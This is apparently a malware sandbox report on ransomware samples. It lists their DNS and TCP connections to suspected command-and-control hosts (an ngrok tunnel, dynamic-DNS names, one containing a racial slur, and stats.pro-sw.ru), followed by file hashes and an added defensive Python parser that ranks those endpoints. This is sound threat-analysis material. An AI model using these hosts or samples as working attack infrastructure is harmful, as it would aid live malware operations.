| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | 74.107.128.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | testdns.ydns.eu | udp |
| NL | 81.19.134.39:287 | testdns.ydns.eu | tcp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | www.ibayme.eb2a.com | udp |
| US | 199.59.243.226:80 | www.ibayme.eb2a.com | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| KR | 1.234.83.146:11170 |  | tcp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.44.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.207.131.3.in-addr.arpa | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:6606 |  | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| NL | 81.19.134.39:287 | testdns.ydns.eu | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| KR | 218.54.30.235:11120 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| JP | 133.242.129.155:11120 |  | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:6606 |  | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:54984 |  | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 135.148.139.222:33569 |  | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| N/A | 127.0.0.1:54984 |  | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 |  | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | 170.45.138.3.in-addr.arpa | udp |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 |  | tcp |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
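The Network table mixes the sandbox's own noise (reverse lookups, resolver traffic to 8.8.8.8, beacons to the lab's private and loopback addresses) with the endpoints that matter: the `2.tcp.ngrok.io` tunnel on a high port, `stats.pro-sw.ru:8484`, `135.148.139.222:33569` and a set of `ddns.net` names that never resolve. What follows is an added example, not part of the report: a parser for this table's row format (it accepts rows whose empty domain cell falls either before or after the protocol, as some rows on this page do) that aggregates TCP connections per endpoint, separates lab-internal traffic, and orders the remaining external endpoints by how often they were contacted. The sample rows are a constructed subset of the table above; the suffix list of dynamic-DNS/tunnel providers and the list of IP-lookup services are the editor's assumptions, seeded from names in this table, not something the report states.

```python
"""Extract and rank network indicators from a sandbox connection table (added example)."""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed subset of the Network table above, kept in the page's row format.
SAMPLE_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.my-ip.io | udp |
| DE | 23.88.33.229:443 | api.my-ip.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| N/A | 10.10.0.135:4444 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:6606 |  | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
"""

# Assumed lists (editor's, seeded from names in the table; not from the report).
DYNDNS_OR_TUNNEL = ("ddns.net", "ngrok.io", "mooo.com", "ydns.eu")
IP_LOOKUP_SERVICES = {"api.my-ip.io", "checkip.dyndns.org", "freegeoip.app", "ipbase.com"}
COMMON_PORTS = {80, 443}


@dataclass
class Row:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


@dataclass
class Indicator:
    ip: str
    port: int
    domain: str
    attempts: int = 0
    flags: List[str] = field(default_factory=list)


def parse_rows(text: str) -> List[Row]:
    """Parse `| Country | Destination | Domain | Proto |` rows; skip the header."""
    rows: List[Row] = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) < 4 or cells[0] == "Country":
            continue
        country, dest, c3, c4 = cells[:4]
        # Misaligned rows carry the protocol in the third cell and nothing in the fourth.
        if c3.lower() in ("tcp", "udp") and not c4:
            domain, proto = "", c3
        else:
            domain, proto = c3, c4
        ip, port = dest.rsplit(":", 1)
        rows.append(Row(country, ip, int(port), domain, proto.lower()))
    return rows


def queried_domains(rows: List[Row]) -> Set[str]:
    """Names the sample resolved, ignoring the sandbox's reverse lookups."""
    return {r.domain for r in rows
            if r.proto == "udp" and r.port == 53 and r.domain
            and not r.domain.endswith(".in-addr.arpa")}


def extract_indicators(rows: List[Row]) -> Dict[str, Indicator]:
    """Aggregate TCP connections by ip:port and flag what stands out."""
    out: Dict[str, Indicator] = {}
    for r in rows:
        if r.proto != "tcp":
            continue
        ind = out.setdefault(f"{r.ip}:{r.port}", Indicator(r.ip, r.port, r.domain))
        ind.attempts += 1
        if r.domain and not ind.domain:
            ind.domain = r.domain
    for ind in out.values():
        addr = ipaddress.ip_address(ind.ip)
        if addr.is_private or addr.is_loopback:
            ind.flags.append("lab-internal")      # beacons to the analysis network, not C2
        if ind.domain.endswith(DYNDNS_OR_TUNNEL):
            ind.flags.append("dyndns-or-tunnel")
        if ind.domain in IP_LOOKUP_SERVICES:
            ind.flags.append("ip-lookup")         # victim geolocation, low value as a block
        if ind.port not in COMMON_PORTS:
            ind.flags.append("uncommon-port")
    return out


def c2_candidates(indicators: Dict[str, Indicator]) -> List[Indicator]:
    """External endpoints, most-contacted first, with IP-lookup services left out."""
    ext = [i for i in indicators.values()
           if "lab-internal" not in i.flags and "ip-lookup" not in i.flags]
    return sorted(ext, key=lambda i: (-i.attempts, i.ip, i.port))


if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_TABLE)
    print("resolved:", sorted(queried_domains(parsed)))
    for c in c2_candidates(extract_indicators(parsed)):
        print(f"{c.ip}:{c.port:<6} x{c.attempts} {c.domain or '-':24} {','.join(c.flags)}")
```

Two caveats when turning this into blocks: the ngrok address rotates (three different `3.x.x.x` IPs serve `2.tcp.ngrok.io:12438` in the table), so the hostname and port are the durable indicator, and a `ddns.net` name that only ever appears in DNS rows with no matching TCP row was unresolvable during the run, which is still worth a DNS block.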
Files
C:\Users\Admin\AppData\Local\Temp\7zE0F127F87\00462\Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
| MD5 | 2f6178aeb84f9bd7d75266e14bc36703 |
| SHA1 | ffef42bdbf9988a3f8796edddeec41d804c6c05d |
| SHA256 | e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38 |
| SHA512 | 9666c75096917b2be130affc9710b396535ee8115b1def80ceb4e1dbeb25498f107fcfbd0176047be28ef7569bd2d73f4e293c994d4646c7d6d65bc83d80f143 |
memory/4316-110-0x000002385F4C0000-0x000002385F4E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzmhmcss.fnn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4316-118-0x000002385F980000-0x000002385F9C4000-memory.dmp
memory/4316-119-0x000002385FA50000-0x000002385FAC6000-memory.dmp
memory/4316-121-0x000002385FA10000-0x000002385FA2E000-memory.dmp
memory/820-124-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-125-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-126-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-136-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-135-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-134-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-133-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-132-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-131-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-130-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
| MD5 | f7a5e2a563416a7c2950db32638f171b |
| SHA1 | 579be3f7f767fd3c08534a3510f5a8f4ed1ca053 |
| SHA256 | 7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245 |
